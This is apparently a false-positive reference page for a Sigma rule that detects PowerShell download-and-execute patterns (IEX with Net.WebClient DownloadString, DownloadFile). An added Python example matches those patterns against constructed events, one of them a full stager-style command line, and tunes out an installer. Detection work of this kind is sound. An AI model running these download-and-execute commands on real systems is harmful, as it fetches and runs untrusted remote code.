LoFP / software installers that pull packages from remote systems and execute them

Techniques

Sample rules

Suspicious PowerShell Download and Execute Pattern

Description

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitively)

Detection logic

condition: selection
selection:
  CommandLine|contains:
  - IEX ((New-Object Net.WebClient).DownloadString
  - IEX (New-Object Net.WebClient).DownloadString
  - IEX((New-Object Net.WebClient).DownloadString
  - IEX(New-Object Net.WebClient).DownloadString
  - ' -command (New-Object System.Net.WebClient).DownloadFile('
  - ' -c (New-Object System.Net.WebClient).DownloadFile('
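The following is an added example, not part of the LoFP page or the Sigma rule itself. It evaluates the six CommandLine patterns above with Sigma's case-insensitive contains semantics against constructed process-creation events, and shows one way to suppress the installer false positive this page documents by filtering on a parent image. The parent-image allowlist, the event shapes and the URLs are assumptions.

```python
# Added example: evaluate the rule's CommandLine|contains patterns and tune
# out the documented installer false positive. Sample data is constructed.

# The six patterns exactly as listed in the rule's detection logic.
PATTERNS = [
    "IEX ((New-Object Net.WebClient).DownloadString",
    "IEX (New-Object Net.WebClient).DownloadString",
    "IEX((New-Object Net.WebClient).DownloadString",
    "IEX(New-Object Net.WebClient).DownloadString",
    " -command (New-Object System.Net.WebClient).DownloadFile(",
    " -c (New-Object System.Net.WebClient).DownloadFile(",
]

# Hypothetical tuning list: parent images of installers/updaters that are
# known in this environment to download packages and run them (the false
# positive this page describes). The path is a constructed placeholder.
INSTALLER_PARENTS = {"c:\\program files\\examplevendor\\updater.exe"}

def matches_rule(command_line: str, case_insensitive: bool = True) -> bool:
    """Sigma 'contains' semantics: substring match, case-insensitive by
    default, which is what the rule description requires of the backend."""
    haystack = command_line.lower() if case_insensitive else command_line
    return any((p.lower() if case_insensitive else p) in haystack for p in PATTERNS)

def evaluate(events, tune: bool = True):
    """Return indices of events that fire. With tune=True the installer
    false positive is suppressed by matching the parent image."""
    hits = []
    for i, ev in enumerate(events):
        if not matches_rule(ev["CommandLine"]):
            continue
        if tune and ev.get("ParentImage", "").lower() in INSTALLER_PARENTS:
            continue
        hits.append(i)
    return hits

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\explorer.exe",           # lowercase stager-style call
     "CommandLine": "powershell.exe iex (new-object net.webclient).downloadstring('http://example.invalid/a')"},
    {"ParentImage": "C:\\Program Files\\ExampleVendor\\updater.exe",  # installer FP
     "CommandLine": "powershell.exe -command (New-Object System.Net.WebClient).DownloadFile('https://pkg.example.invalid/setup.msi','C:\\Temp\\setup.msi')"},
    {"ParentImage": "C:\\Windows\\explorer.exe",           # benign, no match
     "CommandLine": "powershell.exe -command Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    print("untuned hits:", evaluate(SAMPLE_EVENTS, tune=False))  # [0, 1]
    print("tuned hits:  ", evaluate(SAMPLE_EVENTS))              # [0]
```

Note that the first event fires only when matching is case-insensitive; a backend that compares the patterns case-sensitively misses it entirely.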